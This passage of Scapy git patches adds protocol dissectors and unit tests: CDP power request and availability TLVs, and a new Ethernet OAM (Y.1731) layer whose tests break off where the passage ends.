b"\x52\x54\x50\x53\x02\x02\x01\x0f\x01\x0f\x45\xd2\xb3\xf5\x58\xb9" \ + b"\x01\x00\x00\x00\x07\x01\x1c\x00\x00\x00\x03\xc7\x00\x00\x03\xc2" \ + b"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00" \ + b"\x01\x00\x00\x00" + +p0 = RTPS(d) + +p1 = RTPS( + protocolVersion=ProtocolVersionPacket(major=2, minor=2), + vendorId=VendorIdPacket(vendor_id=0x010f), + guidPrefix=GUIDPrefixPacket( + hostId=0x010f45d2, appId=0xb3f558b9, instanceId=0x01000000 + ), + magic=b"RTPS", +) / RTPSMessage( + submessages=[ + RTPSSubMessage_HEARTBEAT( + submessageId=0x07, + submessageFlags=0x01, + octetsToNextHeader=28, + reader_id=b"\x00\x00\x03\xc7", + writer_id=b"\x00\x00\x03\xc2", + firstAvailableSeqNumHi=0, + firstAvailableSeqNumLow=1, + lastSeqNumHi=0, + lastSeqNumLow=1, + count=1 + ) + ] +) + +assert p0.build() == d +assert p1.build() == d +assert p0 == p1 From b94953d8c5232ff548d82aa9eb98209d0d43de64 Mon Sep 17 00:00:00 2001 From: CQ Date: Tue, 6 Feb 2024 06:26:30 +0800 Subject: [PATCH 1187/1632] CDP: add CDPMsgPowerRequest and CDPMsgPowerAvailable (#3805) * CDP: add CDPMsgPowerRequest and CDPMsgPowerAvailable * add test for CDPMsgPowerRequest and CDPMsgPowerAvailable --- scapy/contrib/cdp.py | 33 +++++++++++++++++++++++++++------ test/contrib/cdp.uts | 24 ++++++++++++++++++++++++ 2 files changed, 51 insertions(+), 6 deletions(-) diff --git a/scapy/contrib/cdp.py b/scapy/contrib/cdp.py index df814e277a4..a1532b78783 100644 --- a/scapy/contrib/cdp.py +++ b/scapy/contrib/cdp.py @@ -19,7 +19,9 @@ ByteEnumField, ByteField, FieldLenField, + FieldListField, FlagsField, + IntField, IP6Field, IPField, OUIField, @@ -63,8 +65,8 @@ # 0x0015: "CDPMsgSystemOID", 0x0016: "CDPMsgMgmtAddr", # 0x0017: "CDPMsgLocation", - 0x0019: "CDPMsgUnknown19", - # 0x001a: "CDPPowerAvailable" + 0x0019: "CDPMsgPowerRequest", + 0x001a: "CDPMsgPowerAvailable" } _cdp_tlv_types = {0x0001: "Device ID", @@ -91,7 +93,7 @@ 0x0016: "Management Address", 0x0017: "Location", 0x0018: "CDP Unknown command (send us a pcap file)", - 0x0019: "CDP Unknown command (send us a pcap file)", + 0x0019: "Power Request", 0x001a: "Power Available"} @@ -351,9 +353,28 @@ class CDPMsgMgmtAddr(CDPMsgAddr): type = 0x0016 -class CDPMsgUnknown19(CDPMsgGeneric): - name = "Unknown CDP Message" - type = 0x0019 +class CDPMsgPowerRequest(CDPMsgGeneric): + name = "Power Request" + fields_desc = [XShortEnumField("type", 0x0019, _cdp_tlv_types), + FieldLenField("len", None, "power_requested_list", fmt="!H", + adjust=lambda pkt, x: x + 8), + ShortField("req_id", 0), + ShortField("mgmt_id", 0), + FieldListField("power_requested_list", [], + IntField("power_requested", 0), + count_from=lambda pkt: (pkt.len - 8) // 4)] + + +class CDPMsgPowerAvailable(CDPMsgGeneric): + name = "Power Available" + fields_desc = [XShortEnumField("type", 0x001a, _cdp_tlv_types), + FieldLenField("len", None, "power_available_list", fmt="!H", + adjust=lambda pkt, x: x + 8), + ShortField("req_id", 0), + ShortField("mgmt_id", 0), + FieldListField("power_available_list", [], + IntField("power_available", 0), + count_from=lambda pkt: (pkt.len - 8) // 4)] class CDPMsg(CDPMsgGeneric): diff --git a/test/contrib/cdp.uts b/test/contrib/cdp.uts index 06b9d7f598d..9a6601bcc72 100644 --- a/test/contrib/cdp.uts +++ b/test/contrib/cdp.uts @@ -89,3 +89,27 @@ assert cdp_msg_addr.haslayer(CDPAddrRecordIPv6) assert len(cdp_msg_addr.addr) == 2 assert raw(cdp_msg_addr)[4:8] == b'\x00\x00\x00\x02' + += CDPv2 - CDPMsgPowerRequest and CDPMsgPowerAvailable Packet +s = b'\x02\xb4\x39\xfa\x00\x01\x00\x09\x53\x63\x61\x70\x79\x00\x02\x00\x11\x00\x00\x00\x01\x01\x01\xcc\x00\x04\x7f\x00\x00\x01\x00\x10\x00\x06\x00\x10\x00\x19\x00\x18\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x04\x00\x1a\x00\x14\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x06\x00\x00\x00\x07' +cdpv2 = CDPv2_HDR(s) +assert cdpv2.vers == 2 +assert cdpv2.ttl == 180 +assert cdpv2.cksum == 0x39fa +assert cdpv2.haslayer(CDPMsgDeviceID) +assert cdpv2.haslayer(CDPMsgAddr) +assert cdpv2.haslayer(CDPMsgPower) +assert cdpv2.haslayer(CDPMsgPowerRequest) +assert cdpv2.haslayer(CDPMsgPowerAvailable) +assert cdpv2[CDPMsgPowerRequest].type == 0x0019 +assert cdpv2[CDPMsgPowerRequest].len == 24 +assert cdpv2[CDPMsgPowerRequest].req_id == 0 +assert cdpv2[CDPMsgPowerRequest].mgmt_id == 0 +assert len(cdpv2[CDPMsgPowerRequest].power_requested_list) == 4 +assert cdpv2[CDPMsgPowerRequest].power_requested_list == [1, 2, 3, 4] +assert cdpv2[CDPMsgPowerAvailable].type == 0x001a +assert cdpv2[CDPMsgPowerAvailable].len == 20 +assert cdpv2[CDPMsgPowerAvailable].req_id == 0 +assert cdpv2[CDPMsgPowerAvailable].mgmt_id == 0 +assert len(cdpv2[CDPMsgPowerAvailable].power_available_list) == 3 +assert cdpv2[CDPMsgPowerAvailable].power_available_list == [5, 6, 7] From 56c01c6b47cb50100b77f26e7ba81c5fa6302146 Mon Sep 17 00:00:00 2001 From: "Matsievskiy S.V" Date: Tue, 6 Feb 2024 01:35:08 +0300 Subject: [PATCH 1188/1632] Add OAM layer (#3770) * Add OAM layer * Fix test --------- Co-authored-by: Sergey Matsievskiy Co-authored-by: gpotter2 <10530980+gpotter2@users.noreply.github.com> --- scapy/contrib/oam.py | 663 ++++++++++++++++++++++++++++++++++++++++++ test/contrib/oam.uts | 670 +++++++++++++++++++++++++++++++++++++++++++ 2 files changed, 1333 insertions(+) create mode 100644 scapy/contrib/oam.py create mode 100644 test/contrib/oam.uts diff --git a/scapy/contrib/oam.py b/scapy/contrib/oam.py new file mode 100644 index 00000000000..a1e861b65ff --- /dev/null +++ b/scapy/contrib/oam.py @@ -0,0 +1,663 @@ +# SPDX-License-Identifier: GPL-2.0-only +# This file is part of Scapy +# See https://scapy.net/ for more information + +# scapy.contrib.description = Operation, administration and maintenance (OAM) +# scapy.contrib.status = loads + +""" + Operation, administration and maintenance (OAM) + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + + :author: Sergey Matsievskiy, matsievskiysv@gmail.com + + :description: + + This module provides Scapy layers for the OAM protocol. + + normative references: + - ITU-T Rec. G.8013/Y.1731 (08/2019) - Operation, administration and + maintenance (OAM) functions and mechanisms for Ethernet-based + networks (https://www.itu.int/rec/T-REC-G.8013) + - ITU-T Rec. G.8031/Y.1342 (01/2015) - Ethernet linear protection + switching (https://www.itu.int/rec/T-REC-G.8031) + - ITU-T Rec. G.8032/Y.1344 (02/2022) - Ethernet ring protection + switching (https://www.itu.int/rec/T-REC-G.8032) +""" + +from scapy.fields import ( + BitEnumField, + BitField, + ByteField, + ConditionalField, + EnumField, + FCSField, + FlagsField, + IntField, + LenField, + LongField, + MACField, + MultipleTypeField, + NBytesField, + OUIField, + PacketField, + PadField, + PacketListField, + ShortField, + FieldListField, +) +from scapy.layers.l2 import Dot1Q +from scapy.packet import Packet, bind_layers +from binascii import crc32 +import struct + + +class MepIdField(ShortField): + """ + Short field with insignificant three leading bytes + """ + + def __init__(self, name, default): + super(MepIdField, self).__init__( + name, default & 0x1FFF if default is not None else default + ) + + +class MegId(Packet): + """ + MEG ID + """ + + name = "MEG ID" + + fields_desc = [ + ByteField("resv", 1), + ByteField("format", 0), + MultipleTypeField( + [ + ( + LenField("length", 13, fmt="B"), + lambda p: p.format == 32, + ), + ( + LenField("length", 15, fmt="B"), + lambda p: p.format == 33, + ) + ], + LenField("length", 45, fmt="B"), + ), + PadField( + MultipleTypeField( + [ + ( + FieldListField("values", [0] * 13, + ByteField("value", 0), + count_from=lambda pkt: pkt.length), + lambda x: x.format == 32, + ), + ( + FieldListField("values", [0] * 15, + ByteField("value", 0), + count_from=lambda pkt: pkt.length), + lambda x: x.format == 33, + ) + ], + NBytesField("values", 0, sz=45), + ), + 45), + ] + + def extract_padding(self, s): + return b"", s + + +class OAM_TLV(Packet): + """ + OAM TLV + """ + + name = "OAM TLV" + fields_desc = [ByteField("type", 1), LenField("length", None)] + + def extract_padding(self, s): + return s[:self.length], s[self.length:] + + +class OAM_DATA_TLV(Packet): + """ + OAM Data TLV + """ + + name = "OAM Data TLV" + fields_desc = [ByteField("type", 3), LenField("length", None)] + + def extract_padding(self, s): + return s[:self.length], s[self.length:] + + +class OAM_TEST_TLV(Packet): + """ + OAM test TLV data + """ + + name = "OAM test TLV" + + fields_desc = [ + ByteField("type", 32), + MultipleTypeField( + [ + ( + LenField("length", None, adjust=lambda l: l + 5), + lambda p: p.pat_type == 1 or p.pat_type == 3, + ) + ], + LenField("length", None, adjust=lambda l: l + 1), + ), + EnumField( + "pat_type", + 0, + { + 0: "Null signal without CRC-32", + 1: "Null signal with CRC-32", + 2: "PRBS 2^-31 - 1 without CRC-32", + 3: "PRBS 2^-31 - 1 with CRC-32", + }, + fmt="B", + ), + ConditionalField( + FCSField("crc", None, fmt="!I"), + lambda p: p.pat_type == 1 or p.pat_type == 3, + ), + ] + + def do_dissect(self, s): + if ord(s[3:4]) == 1 or ord(s[3:4]) == 3: + # move crc to the end of packet + length = struct.unpack("!H", s[1:3])[0] + crc_end = 3 + length + crc_start = crc_end - 4 + s1 = s[:crc_start] + s2 = s[crc_start:crc_end] + s3 = s[crc_end:] + s = s1 + s3 + s2 + s = super(OAM_TEST_TLV, self).do_dissect(s) + return s + + def post_build(self, p, pay): + if ord(p[3:4]) == 1 or ord(p[3:4]) == 3: + p1 = p + p2 = pay[:-4] + p3 = struct.pack("!I", crc32(p1 + p2) % (1 << 32)) + return p1 + p2 + p3 + else: + return p + pay + + def extract_padding(self, s): + if self.pat_type == 1 or self.pat_type == 3: + # we already consumed crc + return s[:self.length - 5], s[self.length - 5:] + else: + return s[:self.length - 1], s[self.length - 1:] + + +class OAM_LTM_TLV(Packet): + """ + OAM LTM TLV data + """ + + name = "OAM LTM Egress ID TLV" + + fields_desc = [ + ByteField("type", 7), + LenField("length", 8), + LongField("egress_id", 0), + ] + + def extract_padding(self, s): + return b"", s + + +class OAM_LTR_TLV(Packet): + """ + OAM LTR TLV data + """ + + name = "OAM LTR Egress ID TLV" + + fields_desc = [ + ByteField("type", 8), + LenField("length", 16), + # NOTE: wireshark interprets this field as short+MAC + LongField("last_egress_id", 0), + # NOTE: wireshark interprets this field as short+MAC + LongField("next_egress_id", 0), + ] + + def extract_padding(self, s): + return b"", s + + +class OAM_LTR_IG_TLV(Packet): + """ + OAM LTR TLV data + """ + + name = "OAM LTR Ingress TLV" + + fields_desc = [ + ByteField("type", 5), + LenField("length", 7), + ByteField("ingress_act", 0), + MACField("ingress_mac", None), + ] + + def extract_padding(self, s): + return b"", s + + +class OAM_LTR_EG_TLV(Packet): + """ + OAM LTR TLV data + """ + + name = "OAM LTR Egress TLV" + + fields_desc = [ + ByteField("type", 6), + LenField("length", 7), + ByteField("egress_act", 0), + MACField("egress_mac", None), + ] + + def extract_padding(self, s): + return b"", s + + +class OAM_TEST_ID_TLV(Packet): + """ + OAM Test ID TLV data + """ + + name = "OAM Test ID TLV" + + fields_desc = [ + ByteField("type", 36), + LenField("length", 32), + IntField("test_id", 0), + ] + + def extract_padding(self, s): + return b"", s + + +def guess_tlv_type(pkt, lst, cur, remain): + if remain[0:1] == b'\x00': + return None + elif remain[0:1] == b'\x03': + return OAM_DATA_TLV + elif remain[0:1] == b'\x05': + return OAM_LTR_IG_TLV + elif remain[0:1] == b'\x06': + return OAM_LTR_EG_TLV + elif remain[0:1] == b'\x07': + return OAM_LTM_TLV + elif remain[0:1] == b'\x08': + return OAM_LTR_TLV + elif remain[0:1] == b'\x20': + return OAM_TEST_TLV + elif remain[0:1] == b'\x24': + return OAM_TEST_ID_TLV + else: + return OAM_TLV + + +class PTP_TIMESTAMP(Packet): + """ + PTP timestamp + """ + + # TODO: should be a part of PTP module + name = "PTP timestamp" + fields_desc = [IntField("seconds", 0), IntField("nanoseconds", 0)] + + def extract_padding(self, s): + return b"", s + + +class APS(Packet): + """ + Linear protective switching APS data packet + """ + + name = "APS" + + fields_desc = [ + BitEnumField( + "req_st", + 0, + 4, + { + 0b0000: "No request (NR)", + 0b0001: "Do not request (DNR)", + 0b0010: "Reverse request (RR)", + 0b0100: "Exercise (EXER)", + 0b0101: "Wait-to-restore (WTR)", + 0b0110: "Deprecated", + 0b0111: "Manual switch (MS)", + 0b1001: "Signal degrade (SD)", + 0b1011: "Signal fail for working (SF)", + 0b1101: "Forced switch (FS)", + 0b1110: "Signal fail on protection (SF-P)", + 0b1111: "Lockout of protection (LO)", + }, + ), + FlagsField( + "prot_type", + 0, + 4, + { + (1 << 3): "A", + (1 << 2): "B", + (1 << 1): "D", + (1 << 0): "R", + }, + ), + EnumField( + "req_sig", 0, {0: "Null signal", 1: "Normal traffic"}, fmt="B" + ), + EnumField( + "br_sig", 0, {0: "Null signal", 1: "Normal traffic"}, fmt="B" + ), + FlagsField("br_type", 0, 8, {(1 << 7): "T"}), + ] + + def extract_padding(self, s): + return b"", s + + +class RAPS(Packet): + """ + Ring protective switching R-APS data packet + """ + + name = "R-APS" + + fields_desc = [ + BitEnumField( + "req_st", + 0, + 4, + { + 0b0000: "No request (NR)", + 0b0111: "Manual switch (MS)", + 0b1011: "Signal fail(SF)", + 0b1101: "Forced switch (FS)", + 0b1110: "Event", + }, + ), + MultipleTypeField( + [ + ( + BitEnumField("sub_code", 0, 4, {0b0000: "Flush"}), + lambda p: p.req_st == 0b1110, + ) + ], + BitField("sub_code", 0, 4), + ), + FlagsField( + "status", + 0, + 8, + { + (1 << 7): "RB", + (1 << 6): "DNF", + (1 << 5): "BPR", + }, + ), + MACField("node_id", None), + NBytesField("resv", 0, 24), + ] + + def extract_padding(self, s): + return b"", s + + +class OAM(Packet): + """ + OAM data unit + """ + + name = "OAM" + + OPCODES = { + 1: "Continuity Check Message (CCM)", + 3: "Loopback Message (LBM)", + 2: "Loopback Reply (LBR)", + 5: "Linktrace Message (LTM)", + 4: "Linktrace Reply (LTR)", + 32: "Generic Notification Message (GNM)", + 33: "Alarm Indication Signal (AIS)", + 35: "Lock Signal (LCK)", + 37: "Test Signal (TST)", + 39: "Automatic Protection Switching (APS)", + 40: "Ring-Automatic Protection Switching (R-APS)", + 41: "Maintenance Communication Channel (MCC)", + 43: "Loss Measurement Message (LMM)", + 42: "Loss Measurement Reply (LMR)", + 45: "One Way Delay Measurement (1DM)", + 47: "Delay Measurement Message (DMM)", + 46: "Delay Measurement Reply (DMR)", + 49: "Experimental OAM Message (EXM)", + 48: "Experimental OAM Reply (EXR)", + 51: "Vendor Specific Message (VSM)", + 50: "Vendor Specific Reply (VSR)", + 52: "Client Signal Fail (CSF)", + 53: "One Way Synthetic Loss Measurement (1SL)", + 55: "Synthetic Loss Message (SLM)", + 54: "Synthetic Loss Reply (SLR)", + } + + TIME_FLAGS = { + 0b000: "Invalid value", + 0b001: "Trans Int 3.33ms", + 0b010: "Trans Int 10ms", + 0b011: "Trans Int 100ms", + 0b100: "Trans Int 1s", + 0b101: "Trans Int 10s", + 0b110: "Trans Int 1min", + 0b111: "Trans Int 10min", + } + + PERIOD_FLAGS = { + 0b100: "1 frame per second", + 0b110: "1 frame per minute", + } + + BNM_PERIOD_FLAGS = { + 0b100: "1 frame per second", + 0b101: "1 frame per 10 seconds", + 0b110: "1 frame per minute", + } + + fields_desc = [ + # Common fields + BitField("mel", 0, 3), + MultipleTypeField( + [(BitField("version", 1, 5), lambda x: x.opcode in [43, 45, 47])], + BitField("version", 0, 5), + ), + EnumField("opcode", None, OPCODES, fmt="B"), + MultipleTypeField( + [ + ( + FlagsField("flags", 0, 5, {(1 << 4): "RDI"}), + lambda x: x.opcode == 1, + ), + ( + FlagsField("flags", 0, 8, {(1 << 7): "HWonly"}), + lambda x: x.opcode == 5, + ), + ( + FlagsField( + "flags", + 0, + 8, + { + (1 << 7): "HWonly", + (1 << 6): "FwdYes", + (1 << 5): "TerminalMEP", + }, + ), + lambda x: x.opcode == 4, + ), + (BitField("flags", 0, 5), lambda x: x.opcode in [33, 35, 32]), + ( + FlagsField("flags", 0, 8, {1: "Proactive"}), + lambda x: x.opcode in [43, 45, 47], + ), + ( + BitEnumField( + "flags", + 0, + 5, + { + 0b000: "LOS", + 0b001: "FDI", + 0b010: "RDI", + 0b011: "DCI", + }, + ), + lambda x: x.opcode == 52, + ), + ], + ByteField("flags", 0), + ), + ConditionalField( + MultipleTypeField( + [ + ( + BitEnumField("period", 1, 3, TIME_FLAGS), + lambda x: x.opcode == 1, + ), + ( + BitEnumField("period", 0b110, 3, BNM_PERIOD_FLAGS), + lambda x: x.opcode in [13, 32], + ), + ], + BitEnumField("period", 0b110, 3, PERIOD_FLAGS), + ), + lambda x: x.opcode in [1, 33, 35, 52, 32], + ), + MultipleTypeField( + [ + (ByteField("tlv_offset", 70), lambda x: x.opcode == 1), + ( + ByteField("tlv_offset", 4), + lambda x: x.opcode in [3, 2, 37, 39], + ), + (ByteField("tlv_offset", 17), lambda x: x.opcode == 5), + (ByteField("tlv_offset", 6), lambda x: x.opcode == 4), + (ByteField("tlv_offset", 32), lambda x: x.opcode in [40, 47]), + (ByteField("tlv_offset", 12), lambda x: x.opcode == 43), + ( + ByteField("tlv_offset", 16), + lambda x: x.opcode in [45, 54, 53, 55], + ), + (ByteField("tlv_offset", 13), lambda x: x.opcode == 32), + ( + ByteField("tlv_offset", 10), + lambda x: x.opcode == 41 + ), + ], + ByteField("tlv_offset", 0), + ), + # End common fields + ConditionalField( + IntField("seq_num", 0), lambda x: x.opcode in [1, 3, 2, 37] + ), + ConditionalField(IntField("trans_id", 0), + lambda x: x.opcode in [5, 4]), + ConditionalField( + OUIField("oui", None), lambda x: x.opcode in [41, 49, 48, 51, 50] + ), + ConditionalField( + MultipleTypeField( + [(ByteField("subopcode", 1), lambda x: x.opcode == 32)], + ByteField("subopcode", 0), + ), + lambda x: x.opcode in [41, 49, 48, 51, 50, 32], + ), + ConditionalField( + MepIdField("mep_id", 0), + lambda x: x.opcode == 1 \ + or (x.opcode == 41 and x.subopcode == 1 and x.oui == 6567), + ), + ConditionalField( + PacketField("meg_id", MegId(), MegId), lambda x: x.opcode == 0x01 + ), + ConditionalField( + ShortField("src_mep_id", 0), lambda x: x.opcode in [55, 54, 53] + ), + ConditionalField( + ShortField("rcv_mep_id", 0), lambda x: x.opcode in [55, 54, 53] + ), + ConditionalField( + IntField("test_id", 0), lambda x: x.opcode in [55, 54, 53] + ), + ConditionalField( + IntField("txfcf", 0), lambda x: x.opcode in [1, 43, 42, 55, 54, 53] + ), + ConditionalField(IntField("rxfcb", 0), lambda x: x.opcode == 1), + ConditionalField(IntField("rxfcf", 0), lambda x: x.opcode in [43, 42]), + ConditionalField( + IntField("txfcb", 0), lambda x: x.opcode in [1, 43, 42, 55, 54] + ), + ConditionalField(IntField("resv", 0), lambda x: x.opcode in [1, 53]), + ConditionalField(ByteField("ttl", 0), lambda x: x.opcode in [5, 4]), + ConditionalField(MACField("orig_mac", None), lambda x: x.opcode == 5), + ConditionalField(MACField("targ_mac", None), lambda x: x.opcode == 5), + ConditionalField(ByteField("relay_act", None), + lambda x: x.opcode == 4), + ConditionalField( + PacketField("txtsf", PTP_TIMESTAMP(), PTP_TIMESTAMP), + lambda x: x.opcode in [45, 47, 46], + ), + ConditionalField( + PacketField("rxtsf", PTP_TIMESTAMP(), PTP_TIMESTAMP), + lambda x: x.opcode in [45, 47, 46], + ), + ConditionalField( + PacketField("txtsb", PTP_TIMESTAMP(), PTP_TIMESTAMP), + lambda x: x.opcode in [47, 46], + ), + ConditionalField( + PacketField("rxtsb", PTP_TIMESTAMP(), PTP_TIMESTAMP), + lambda x: x.opcode in [47, 46], + ), + ConditionalField( + IntField("expct_dur", None), + lambda x: x.opcode == 41 and x.subopcode == 1 and x.oui == 6567, + ), + ConditionalField(IntField("nom_bdw", None), lambda x: x.opcode == 32), + ConditionalField(IntField("curr_bdw", None), lambda x: x.opcode == 32), + ConditionalField(IntField("port_id", None), lambda x: x.opcode == 32), + ConditionalField( + PacketField("aps", APS(), APS), lambda x: x.opcode == 39 + ), + ConditionalField( + PacketField("raps", RAPS(), RAPS), lambda x: x.opcode == 40 + ), + ConditionalField( + PacketListField("tlvs", [], next_cls_cb=guess_tlv_type), + lambda x: x.opcode in [3, 2, 5, 4, 37, 45, 47, 46, 55, 54, 53], + ), + ConditionalField( + IntField("opt_data", None), + lambda x: x.opcode in [49, 48, 51, 50] and False, + ), # FIXME: field documented elsewhere + # TODO: add EXM, EXR, VSM and VSR data + ByteField("end_tlv", 0), + ] + + +bind_layers(Dot1Q, OAM, type=0x8902) diff --git a/test/contrib/oam.uts b/test/contrib/oam.uts new file mode 100644 index 00000000000..b2b85bcd1b1 --- /dev/null +++ b/test/contrib/oam.uts @@ -0,0 +1,670 @@ +# OAM unit tests +# +# Type the following command to launch start the tests: +# $ test/run_tests -P "load_contrib('oam')" -t test/contrib/oam.uts + ++ TLV + += Generic TLV + +pkt = OAM_TLV(raw(OAM_TLV()/Raw(b'123'))) +assert pkt.type == 1 +assert pkt.length == 3 + += Data TLV + +pkt = OAM_DATA_TLV(raw(OAM_DATA_TLV()/Raw(b'123'))) +assert pkt.type == 3 +assert pkt.length == 3 + += Test TLV + +from binascii import crc32 + +pkt = OAM_TEST_TLV(raw(OAM_TEST_TLV(pat_type="Null signal without CRC-32")/Raw(b'123'))) +assert pkt.type == 32 +assert pkt.length == 4 +assert raw(pkt.payload) == b'123' +pkt = OAM_TEST_TLV(raw(OAM_TEST_TLV(pat_type="Null signal with CRC-32")/Raw(b'123'))) +assert pkt.type == 32 +assert pkt.length == 8 +assert pkt.crc == crc32(raw(pkt)[:-4]) % (1 << 32) +assert pkt.crc == 0xad147086 +assert raw(pkt.payload) == b'123' +pkt = OAM_TEST_TLV(raw(OAM_TEST_TLV(pat_type="PRBS 2^-31 - 1 without CRC-32")/Raw(b'123'))) +assert pkt.type == 32 +assert pkt.length == 4 +assert raw(pkt.payload) == b'123' +pkt = OAM_TEST_TLV(raw(OAM_TEST_TLV(pat_type="PRBS 2^-31 - 1 with CRC-32")/Raw(b'123'))) +assert pkt.type == 32 +assert pkt.length == 8 +assert pkt.crc == crc32(raw(pkt)[:-4]) % (1 << 32) +assert pkt.crc == 0x71db80d +assert raw(pkt.payload) == b'123' + += LTM TLV + +pkt = OAM_LTM_TLV(raw(OAM_LTM_TLV(egress_id=3)/Raw(b'123'))) +assert pkt.type == 7 +assert pkt.length == 8 +assert pkt.egress_id == 3 + += LTR TLV + +pkt = OAM_LTR_TLV(raw(OAM_LTR_TLV(last_egress_id=2, next_egress_id=4)/Raw(b'123'))) +assert pkt.type == 8 +assert pkt.length == 16 +assert pkt.last_egress_id == 2 +assert pkt.next_egress_id == 4 + += LTR IG TLV + +pkt = OAM_LTR_IG_TLV(raw(OAM_LTR_IG_TLV(ingress_act=2, ingress_mac="00:11:22:33:44:55")/Raw(b'123'))) +assert pkt.type == 5 +assert pkt.length == 7 +assert pkt.ingress_act == 2 +assert pkt.ingress_mac == "00:11:22:33:44:55" + += LTR EG TLV + +pkt = OAM_LTR_EG_TLV(raw(OAM_LTR_EG_TLV(egress_act=2, egress_mac="00:11:22:33:44:55")/Raw(b'123'))) +assert pkt.type == 6 +assert pkt.length == 7 +assert pkt.egress_act == 2 +assert pkt.egress_mac == "00:11:22:33:44:55" + += TEST ID TLV + +pkt = OAM_TEST_ID_TLV(raw(OAM_TEST_ID_TLV(test_id=1)/Raw(b'123'))) +assert pkt.type == 36 +assert pkt.length == 32 +assert pkt.test_id == 1 + += PTP TIMESTAMP + +pkt = PTP_TIMESTAMP(raw(PTP_TIMESTAMP(seconds=5, nanoseconds=10)/Raw(b'123'))) +assert pkt.seconds == 5 +assert pkt.nanoseconds == 10 + += APS + +pkt = APS(raw(APS(req_st="Wait-to-restore (WTR)", + prot_type="D+A", + req_sig="Normal traffic", + br_sig="Normal traffic", + br_type="T")/Raw(b'123'))) +assert pkt.req_st == 0b0101 +assert pkt.prot_type == 0b1010 +assert pkt.req_sig == 1 +assert pkt.br_sig == 1 +assert pkt.br_type == 0b10000000 + += RAPS + +pkt = RAPS(raw(RAPS(req_st="Signal fail(SF)", + status="RB+BPR", + node_id="00:11:22:33:44:55")/Raw(b'123'))) +assert pkt.req_st == 0b1011 +assert pkt.sub_code == 0b0000 +assert pkt.status == 0b10100000 +assert pkt.node_id == "00:11:22:33:44:55" + ++ MEG ID + += MEG ID + +pkt = MegId(raw(MegId(format=1, + values=int(0xdeadbeef)))) +assert pkt.format == 1 +# FIXME: make compatible with python2 +# assert pkt.values.to_bytes(45, "little")[-4:] == b"\xde\xad\xbe\xef" +assert pkt.length == 45 +assert len(raw(pkt)) == 48 + += MEG ICC ID + +pkt = MegId(raw(MegId(format=32, + values=list(range(13))))) + +assert pkt.format == 32 +assert pkt.values == list(range(13)) +assert pkt.length == 13 +assert len(raw(pkt)) == 48 + += MEG ICC and CC ID + +pkt = MegId(raw(MegId(format=33, + values=list(range(15))))) + +assert pkt.format == 33 +assert pkt.values == list(range(15)) +assert pkt.length == 15 +assert len(raw(pkt)) == 48 + ++ OAM +~ tshark + += Define check_tshark function + +def check_tshark(pkt, string): + import tempfile, os + fd, pcapfilename = tempfile.mkstemp() + wrpcap(pcapfilename, pkt) + rv = tcpdump(pcapfilename, prog=conf.prog.tshark, getfd=True, args=['-Y', 'cfm'], dump=True, wait=True) + assert string in rv.decode("utf8") + os.close(fd) + os.unlink(pcapfilename) + += CCM + +pkt = Ether(raw(Ether(dst="00:11:22:33:44:55")/Dot1Q()/ + OAM(opcode="Continuity Check Message (CCM)", + flags="RDI", + period="Trans Int 10s", + mep_id=0xffff, + meg_id=MegId(format=32, + values=list(range(13))), + txfcf=1, + rxfcb=2, + txfcb=3))) + +assert pkt[OAM].opcode == 1 +assert pkt[OAM].period == 5 +assert pkt[OAM].tlv_offset == 70 +assert pkt[OAM].flags.RDI == True +assert pkt[OAM].flags == 1<<4 +assert pkt[OAM].mep_id == 0xffff +assert pkt[OAM].meg_id.format == 32 +assert pkt[OAM].meg_id.length == 13 +assert pkt[OAM].meg_id.values == list(range(13)) +assert pkt[OAM].txfcf == 1 +assert pkt[OAM].rxfcb == 2 +assert pkt[OAM].txfcb == 3 + +check_tshark(pkt, "(CCM)") + += LBM + +pkt = Ether(raw(Ether(dst="00:11:22:33:44:55")/Dot1Q()/ + OAM(opcode="Loopback Message (LBM)", + seq_num=33, + tlvs=[OAM_DATA_TLV()/Raw(b'123'), + OAM_DATA_TLV()/Raw(b'456'), + OAM_DATA_TLV()/Raw(b'789')]))) + +assert pkt[OAM].opcode == 3 +assert pkt[OAM].tlv_offset == 4 +assert pkt[OAM].seq_num == 33 +for i in range(3): + assert pkt[OAM].tlvs[i].type == 3 + assert pkt[OAM].tlvs[i].length == 3 + +assert raw(pkt[OAM].tlvs[0].payload) == b'123' +assert raw(pkt[OAM].tlvs[1].payload) == b'456' +assert raw(pkt[OAM].tlvs[2].payload) == b'789' + +check_tshark(pkt, "(LBM)") + += LTM + +pkt = Ether(raw(Ether(dst="00:11:22:33:44:55")/Dot1Q()/ + OAM(opcode="Linktrace Message (LTM)", + trans_id=12, + ttl=21, + flags="HWonly", + orig_mac="12:34:56:78:90:11", + targ_mac="12:34:56:78:90:22", + tlvs=[OAM_LTM_TLV(egress_id=12)]))) + +assert pkt[OAM].opcode == 5 +assert pkt[OAM].tlv_offset == 17 +assert pkt[OAM].ttl == 21 +assert pkt[OAM].flags.HWonly == True +assert pkt[OAM].flags == 1<<7 +assert pkt[OAM].orig_mac == "12:34:56:78:90:11" +assert pkt[OAM].targ_mac == "12:34:56:78:90:22" +assert pkt[OAM].tlvs[0].type == 7 +assert pkt[OAM].tlvs[0].length == 8 +assert pkt[OAM].tlvs[0].egress_id == 12 + +check_tshark(pkt, "(LTM)") + += LTR + +pkt = Ether(raw(Ether(dst="00:11:22:33:44:55")/Dot1Q()/ + OAM(opcode="Linktrace Reply (LTR)", + trans_id=21, + ttl=12, + flags="HWonly+TerminalMEP", + relay_act=8, + tlvs=[OAM_LTR_TLV(last_egress_id=1, next_egress_id=2), + OAM_LTR_TLV(last_egress_id=3, next_egress_id=4), + OAM_LTR_IG_TLV(ingress_act=1, ingress_mac="12:34:56:78:90:11"), + OAM_LTR_IG_TLV(ingress_act=6, ingress_mac="12:34:56:78:90:22"), + OAM_LTR_EG_TLV(egress_act=2, egress_mac="12:34:56:78:90:33"), + OAM_LTR_EG_TLV(egress_act=3, egress_mac="12:34:56:78:90:44")]))) + +assert pkt[OAM].opcode == 4 +assert pkt[OAM].tlv_offset == 6 +assert pkt[OAM].ttl == 12 +assert pkt[OAM].flags.HWonly == True +assert pkt[OAM].flags.FwdYes == False +assert pkt[OAM].flags.TerminalMEP == True +assert pkt[OAM].flags == (1<<7) | (1<<5) +assert pkt[OAM].relay_act == 8 +assert pkt[OAM].tlvs[0].type == 8 +assert 